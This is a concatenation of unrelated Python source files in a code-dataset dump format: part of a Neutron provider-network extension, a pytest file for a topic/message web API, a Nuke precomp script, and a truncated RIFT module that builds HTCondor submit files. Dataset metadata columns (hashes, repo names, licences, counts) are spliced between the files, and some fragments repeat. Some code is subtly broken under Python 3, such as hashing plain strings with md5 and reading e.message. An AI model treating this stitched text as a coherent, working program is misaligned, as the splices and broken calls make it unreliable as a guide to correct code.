extended with attributes in the provider namespace.
With admin rights, network dictionaries returned will also include
provider attributes.
"""
@classmethod
def get_name(cls):
return provider_net.NAME
@classmethod
def get_alias(cls):
return provider_net.ALIAS
@classmethod
def get_description(cls):
return provider_net.DESCRIPTION
@classmethod
def get_updated(cls):
return provider_net.UPDATED_TIMESTAMP
def get_extended_resources(self, version):
if version == "2.0":
return provider_net.RESOURCE_ATTRIBUTE_MAP
else:
return {}
| 0
| 220
| 0
| 787
| 0
| 0
| 0
| 17
| 45
|
8d7f3685a45adea2ebce073ffebe24607e61fa6d
| 3,181
|
py
|
Python
|
tests/test_consumer_api.py
|
tysongg/essential-cosmic
|
1bd21b4ed246dfda983c6e49b0967a4a1a289d63
|
[
"MIT"
] | null | null | null |
tests/test_consumer_api.py
|
tysongg/essential-cosmic
|
1bd21b4ed246dfda983c6e49b0967a4a1a289d63
|
[
"MIT"
] | 9
|
2020-01-27T02:08:04.000Z
|
2020-01-27T02:46:53.000Z
|
tests/test_consumer_api.py
|
tysongg/essential-cosmic
|
1bd21b4ed246dfda983c6e49b0967a4a1a289d63
|
[
"MIT"
] | null | null | null |
import os
import sys
# Workaround so we don't have to create a setup.py file for the project and
# install an editable version
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
| 31.186275
| 85
| 0.607042
|
import pytest
import asyncio
import os
import sys
# Workaround so we don't have to create a setup.py file for the project and
# install an editable version
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
from essential_cosmic.app import make_app
class TestConsumer:
@pytest.fixture(scope="function")
async def cli(self, aiohttp_client):
client = await aiohttp_client(make_app())
return client
@pytest.fixture(scope="function")
async def topic(self, cli):
resp = await cli.post("/topic", json={"title": "Test Topic"})
topic = await resp.json()
return topic
@pytest.fixture(scope="function")
async def messages(self, cli, topic):
resps = await asyncio.gather(
*[
cli.post(
"/topic/%s/message" % topic["id"], json={"value": "Test Message"}
)
for _ in range(3)
]
)
messages = await asyncio.gather(*[resp.json() for resp in resps])
return messages
async def test_topic_list(self, cli, topic):
resp = await cli.get("/topic")
assert resp.status == 200
body_json = await resp.json()
assert type(body_json) == list
assert len(body_json) == 1
async def test_topic_detail(self, cli, topic):
resp = await cli.get("/topic/%s" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == topic
async def test_topic_detail_missing(self, cli):
resp = await cli.get("/topic/missing")
assert resp.status == 404
resp_json = await resp.json()
assert resp_json["message"] == "Topic does not exist"
async def test_topic_message_empty(self, cli, topic):
resp = await cli.get("/topic/%s/message" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert type(resp_json) == list
assert len(resp_json) == 0
async def test_topic_message(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages
assert len(resp_json) == 3
async def test_topic_message_offset(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message?offset=1" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages[1:]
assert len(resp_json) == 2
async def test_topic_message_count(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message?count=2" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages[:2]
assert len(resp_json) == 2
async def test_topic_message_offset_and_count(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message?offset=1&count=1" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages[1:2]
assert len(resp_json) == 1
| 0
| 690
| 1,905
| -2
| 0
| 0
| 0
| 5
| 386
|
d04c8eff07c31a44f0aef8503a211c69268b39fd
| 8,889
|
py
|
Python
|
nuke_stubs/nukescripts/precomp.py
|
sisoe24/Nuke-Python-Stubs
|
79c53cf5cb7b38e15a34fd04f672b143d9d7dc85
|
[
"MIT"
] | 1
|
2022-01-12T01:29:16.000Z
|
2022-01-12T01:29:16.000Z
|
nuke_stubs/nukescripts/precomp.py
|
sisoe24/Nuke-Python-Stubs
|
79c53cf5cb7b38e15a34fd04f672b143d9d7dc85
|
[
"MIT"
] | null | null | null |
nuke_stubs/nukescripts/precomp.py
|
sisoe24/Nuke-Python-Stubs
|
79c53cf5cb7b38e15a34fd04f672b143d9d7dc85
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2009 The Foundry Visionmongers Ltd. All Rights Reserved.
| 28.399361
| 167
| 0.623242
|
# Copyright (c) 2009 The Foundry Visionmongers Ltd. All Rights Reserved.
import nuke
import os, re, sys, math, time
from nukescripts import execute_panel
from nukescripts import panels
class PrecompOptionsDialog( panels.PythonPanel ):
def __init__( self ):
panels.PythonPanel.__init__( self, "Precomp Nodes", "uk.co.thefoundry.PrecompOptionsDialog" )
self.scriptPath = nuke.File_Knob( "script", "Precomp script path " )
self.renderPath = nuke.File_Knob( "render", "Precomp render path " )
self.channels = nuke.Channel_Knob( "channels", "Channels " )
self.origNodes = nuke.Enumeration_Knob( "orig", "Original nodes ", ["add backdrop", "delete", "no change" ] )
self.addKnob ( self.scriptPath )
self.addKnob ( self.renderPath )
self.addKnob ( self.channels )
self.addKnob ( self.origNodes )
self.channels.setValue('all')
defaultDir = nuke.Root()['name'].value()
if defaultDir and defaultDir != "":
defaultDir = os.path.dirname( defaultDir )
if not defaultDir.endswith("/"):
defaultDir += "/"
else:
defaultDir = ""
basename = findNextName("Precomp")
self.scriptPath.setValue( defaultDir + basename + "_v01.nk" )
self.renderPath.setValue( defaultDir + basename + ".####.exr" )
self.setMinimumSize( 420, 50 )
class PrecompOptions:
def __init__(self):
self.scriptPath = ""
self.renderPath = ""
self.channels = ""
self.addBackdrop = False
self.delete = False
def askUserForOptions(self):
p = PrecompOptionsDialog()
result = p.showModalDialog()
if result:
self.scriptPath = p.scriptPath.value()
self.renderPath = p.renderPath.value()
self.channels = p.channels.value()
if p.origNodes.value() == "delete":
self.delete = True
elif p.origNodes.value() == "add backdrop":
self.addBackdrop = True
if nuke.env['nc']:
nukeExt = ".nknc"
if nuke.env['indie']:
nukeExt = ".nkind"
else:
nukeExt = ".nk"
(root, ext) = os.path.splitext(self.scriptPath)
if not ext:
self.scriptPath += nukeExt
elif ext == ".nk" and ext != nukeExt:
self.scriptPath = self.scriptPath[0:-3] + nukeExt
(root,ext) = os.path.splitext(self.renderPath)
if not ext:
self.renderPath += ".exr"
if os.path.exists(self.scriptPath):
if not nuke.ask("Overwrite existing " + self.scriptPath + " ?"):
return False
return True
else:
return False
def precomp_open(precomp):
precomp.executePythonCallback(nuke.PRECOMP_CALLBACK_OPENED)
nuke.Root().setModified( True )
nuke.scriptOpen(precomp["file"].evaluate())
def precomp_render(precomp):
reading = precomp["reading"].getValue()
precomp["reading"].setValue( False )
try:
finalNode = None
if precomp['useOutput'].value() == True:
finalNode = nuke.toNode( precomp['output'].value() )
else:
if precomp.output() and precomp.output().input(0):
finalNode = precomp.output().input(0)
execute_panel( [ finalNode ] )
except RuntimeError as e:
if e.message[0:9] != "Cancelled": # TO DO: change this to an exception type
raise
return
precomp["reading"].setValue( True )
def findNextName(name):
i = 1
while nuke.toNode ( name + str(i) ) != None:
i += 1
return name + str(i)
def precomp_copyToGroup(precomp):
## group context is set to precomp, so back up one level.
nuke.endGroup()
g = nuke.nodes.Group()
with precomp:
nuke.selectAll()
nuke.nodeCopy ( '%clipboard%' )
with g:
nuke.nodePaste( '%clipboard%' )
for k in ['label', 'icon', 'indicators', 'tile_color', 'disable']:
v = precomp[k].value()
if v:
g[k].setValue( v )
for k in precomp.allKnobs():
if isinstance( k, nuke.Link_Knob ):
lnk = nuke.Link_Knob( k.name() )
lnk.setLink( k.getLink() )
g.addKnob( lnk )
def precomp_selected():
nodes = nuke.selectedNodes()
if len(nodes) == 0:
g = nuke.createNode( "Precomp" )
return
options = PrecompOptions()
if not options.askUserForOptions():
return False
sel = nodes[0]
## select upstream nodes
if len( nodes ) == 1:
upstreamNodes = nuke.dependencies( nodes )
while len ( upstreamNodes ) != 0:
nodes += upstreamNodes
upstreamNodes = nuke.dependencies( upstreamNodes )
left = right = nodes[0].xpos()
top = bottom = nodes[0].ypos()
nodeSize = 100
titleHeight = 50
inputs = []
for n in nodes:
n["selected"].setValue ( True )
if n.xpos() < left:
left = n.xpos()
if n.xpos() > right:
right = n.xpos()
if n.ypos() < top:
top = n.ypos()
if n.ypos() > bottom:
bottom = n.ypos()
for i in range( 0, n.inputs() ):
if not n.input(i):
continue
if not n.input(i) in nodes:
inputs.append( n.input(i) )
## find all the dependent nodes
inputDeps = []
expressionDeps = []
for n in nodes:
for d in nuke.dependentNodes( nuke.INPUTS, [n]):
if d not in nodes:
if d.Class() != 'Viewer':
inputIndices = [i for i in range(d.inputs()) if d.input(i) == n]
inputDeps.append( (d, inputIndices) )
for d in nuke.dependencies( [n], nuke.EXPRESSIONS ):
if d not in nodes:
expressionDeps.append( d )
if len(inputDeps) > 1:
nuke.message( "You cannot precomp the selected nodes because there are multiple outputs." )
return
addLinkedExpressionNodes = False
if len(expressionDeps) > 0:
addLinkedExpressionNodes = nuke.ask( "Warning: The selected nodes have expressions to nodes outside the precomp. Do you want to copy these nodes to the precomp?" )
## make group and export
if len( nodes ) == 1 and nodes[0].Class() == "Group":
group = nodes[0]
else:
group = nuke.makeGroup( False )
with group:
outputInputs = []
output = group.output()
for i in range(0, output.inputs()):
outputInputs.append( output.input(i) )
## insert write node or use existing one
outInp = output.input(0)
if outInp is None or outInp.Class() != "Write":
w = nuke.createNode( "Write", inpanel = False)
w.setInput( 0, None )
else:
w = outInp
for i in range(0, len(outputInputs) ):
w.setInput( i, outputInputs[i] )
output.setInput(i, None )
output.setInput(0, w )
w.knob("file").setValue( options.renderPath )
type = os.path.splitext( options.renderPath)[1][1:].lower()
w.knob("file_type").setValue( type )
w.knob("channels").setValue( options.channels )
for n in nuke.allNodes():
n['selected'].setValue( False )
if addLinkedExpressionNodes:
for n in nuke.allNodes():
n['selected'].setValue( False )
for n in expressionDeps:
n['selected'].setValue( True )
nuke.nodeCopy ( '%clipboard%' )
with group:
nuke.nodePaste( '%clipboard%' )
writeOk = True
with group:
try:
nuke.tcl("export_as_precomp", options.scriptPath)
except:
nuke.message( "Could not write precomp script, permission denied, please specify a different \'script path\' and try again.")
writeOk = False
for n in nuke.selectedNodes():
n['selected'].setValue( False )
if group != nodes[0]:
group['selected'].setValue( False )
nuke.delete( group )
if not writeOk:
for n in nuke.selectedNodes():
n['selected'].setValue( False )
for n in nodes:
n['selected'].setValue( True )
return
## reload saved out script
g = nuke.createNode( "Precomp" )
g[ "file" ].setValue( options.scriptPath )
#nuke.tprint( "Selected Node: " + sel.name() )
for d in inputDeps:
node = d[0]
for inp in d[1]:
#nuke.tprint ( "Reconnecting dep " + node.name() + " input " + str(inp) )
node.setInput(inp, g)
## reconnect inputs, if any
for i in range(0, len(inputs)):
#nuke.tprint ( "Reconnecting input " + inputs[i].name() + " " + str(i) )
g.setInput(i, inputs[i] )
pad = 5
if options.addBackdrop:
b = nuke.createNode( "BackdropNode", inpanel = False )
width = int(math.fabs(right - left)) + (pad * 2) + nodeSize
height = int(math.fabs(bottom - top)) + ( pad * 2 ) + nodeSize + titleHeight
b['label'].setValue( os.path.basename( options.scriptPath ) )
b['note_font_size'].setValue( 18 )
b.setXYpos( left - pad * 2, top - ( pad * 2) - titleHeight )
b.knob( "bdwidth" ).setValue( width )
b.knob( "bdheight").setValue( height )
b.knob( "z_order" ).setValue( 0 )
b['selected'].setValue(False)
g.setXYpos( b.xpos() + width/2 - nodeSize/2, b.ypos() + height + pad * 2 )
elif options.delete:
for n in nodes:
nuke.delete( n )
if len(inputs) > 0:
nuke.message( "Warning: The precomp script requires inputs and may not render the same independent of its parent script." )
return group
| 0
| 0
| 0
| 2,282
| 0
| 6,260
| 0
| 24
| 249
|
71db7646b48f42a2dbbfeaf06ad12d63c39123bf
| 72,149
|
py
|
Python
|
MonteCarloMarginalizeCode/Code/RIFT/misc/dag_utils.py
|
spfanning/research-projects-RIT
|
34afc69ccb502825c81285733dac8ff993f79503
|
[
"MIT"
] | 8
|
2019-10-23T01:18:44.000Z
|
2021-07-09T18:24:36.000Z
|
MonteCarloMarginalizeCode/Code/RIFT/misc/dag_utils.py
|
spfanning/research-projects-RIT
|
34afc69ccb502825c81285733dac8ff993f79503
|
[
"MIT"
] | 7
|
2020-01-03T14:38:26.000Z
|
2022-01-17T16:57:02.000Z
|
MonteCarloMarginalizeCode/Code/RIFT/misc/dag_utils.py
|
spfanning/research-projects-RIT
|
34afc69ccb502825c81285733dac8ff993f79503
|
[
"MIT"
] | 11
|
2019-10-23T01:19:50.000Z
|
2021-11-20T23:35:39.000Z
|
# Copyright (C) 2013 Evan Ochsner
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
A collection of routines to manage Condor workflows (DAGs).
"""
import os, sys
import numpy as np
from time import time
from hashlib import md5
from glue import pipeline
__author__ = "Evan Ochsner <[email protected]>, Chris Pankow <[email protected]>"
# Taken from
# http://pythonadventures.wordpress.com/2011/03/13/equivalent-of-the-which-command-in-python/
def generate_job_id():
"""
Generate a unique md5 hash for use as a job ID.
Borrowed and modified from the LAL code in glue/glue/pipeline.py
"""
t = str( int( time() * 1000 ) )
r = str( int( np.random.random() * 100000000000000000 ) )
return md5(t + r).hexdigest()
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
def write_integrate_likelihood_extrinsic_grid_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Like the other case (below), but modified to use the sim_xml
and loop over 'event'
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'sim' is the path to the XML file with the grid
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("event")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
return ile_job, ile_sub_name
# FIXME: Keep in sync with arguments of integrate_likelihood_extrinsic
def write_integrate_likelihood_extrinsic_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'coinc' is the path to a coincident XML file, from which masses and
times will be drawn FIXME: remove this once it's no longer needed.
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("mass1")
ile_job.add_var_opt("mass2")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
return ile_job, ile_sub_name
def write_result_coalescence_sub(tag='coalesce', exe=None, log_dir=None, output_dir="./", use_default_cache=True):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("ligolw_sqlite")
sql_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
sql_sub_name = tag + '.sub'
sql_job.set_sub_file(sql_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
sql_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
sql_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
sql_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if use_default_cache:
sql_job.add_opt("input-cache", "ILE_$(macromassid).cache")
else:
sql_job.add_arg("$(macrofiles)")
#sql_job.add_arg("*$(macromassid)*.xml.gz")
sql_job.add_opt("database", "ILE_$(macromassid).sqlite")
#if os.environ.has_key("TMPDIR"):
#tmpdir = os.environ["TMPDIR"]
#else:
#print >>sys.stderr, "WARNING, TMPDIR environment variable not set. Will default to /tmp/, but this could be dangerous."
#tmpdir = "/tmp/"
tmpdir = "/dev/shm/"
sql_job.add_opt("tmp-space", tmpdir)
sql_job.add_opt("verbose", None)
sql_job.add_condor_cmd('getenv', 'True')
sql_job.add_condor_cmd('request_memory', '1024')
return sql_job, sql_sub_name
def write_posterior_plot_sub(tag='plot_post', exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("plot_like_contours")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("show-points", None)
plot_job.add_opt("dimension1", "mchirp")
plot_job.add_opt("dimension2", "eta")
plot_job.add_opt("input-cache", "ILE_all.cache")
plot_job.add_opt("log-evidence", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '1024')
return plot_job, plot_sub_name
def write_tri_plot_sub(tag='plot_tri', injection_file=None, exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("make_triplot")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("output", "ILE_triplot_$(macromassid).png")
if injection_file is not None:
plot_job.add_opt("injection", injection_file)
plot_job.add_arg("ILE_$(macromassid).sqlite")
plot_job.add_condor_cmd('getenv', 'True')
#plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_1dpos_plot_sub(tag='1d_post_plot', exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("postprocess_1d_cumulative")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("save-sampler-file", "ILE_$(macromassid).sqlite")
plot_job.add_opt("disable-triplot", None)
plot_job.add_opt("disable-1d-density", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_CIP_sub(tag='integrate', exe=None, input_net='all.net',output='output-ILE-samples',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=8192,arg_vals=None, no_grid=False,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("util_ConstructIntrinsicPosterior_GenericCoordinates.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("fname", input_net)
ile_job.add_opt("fname-output-samples", out_dir+"/"+output)
ile_job.add_opt("fname-output-integral", out_dir+"/"+output)
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "fname_output_samples" in kwargs and kwargs["fname_output_samples"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_samples"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
if "fname_output_integral" in kwargs and kwargs["fname_output_integral"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_integral"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
return ile_job, ile_sub_name
def write_puff_sub(tag='puffball', exe=None, input_net='output-ILE-samples',output='puffball',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=1024,arg_vals=None, no_grid=False,**kwargs):
"""
Perform puffball calculation
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("util_ParameterPuffball.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("inj-file", input_net)
ile_job.add_opt("inj-file-out", output)
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
